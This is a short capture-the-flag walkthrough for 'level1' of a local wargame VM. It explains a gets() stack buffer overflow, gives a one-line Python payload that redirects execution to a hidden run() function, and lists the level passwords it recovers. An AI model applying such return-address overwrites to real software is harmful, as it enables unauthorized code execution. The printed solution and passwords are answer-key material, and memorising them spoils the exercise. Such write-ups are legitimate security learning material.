1. Download the binary from the server:
   scp -P 2222 level1@localhost:~/level1 .

2. Analyze the binary with Ghidra

3. Identify the vulnerability:
   - main() uses gets() which is unsafe
   - Buffer is 76 bytes
   - There's a hidden run() function at address 0x08048444 (visible in Ghidra)

4. Connect to the VM via SSH:
   ssh level1@localhost -p 2222
   Password: 1fe8a524fa4bec01ca4ea2a869af2a02260d4a7d5fe7e7c24d8617e6dca12d3a

5. Craft and execute the exploit:
   (python -c 'print "A"*76 + "\x44\x84\x04\x08"'; cat) | ./level1

6. Read the password:
   cat /home/user/level2/.pass

7. Password: 53a4a712787f40ec66c3c26c1f4b164dcad5552b038bb0addd69bf5bf6fa8e77

8. Exit and login as level2:
   su level2
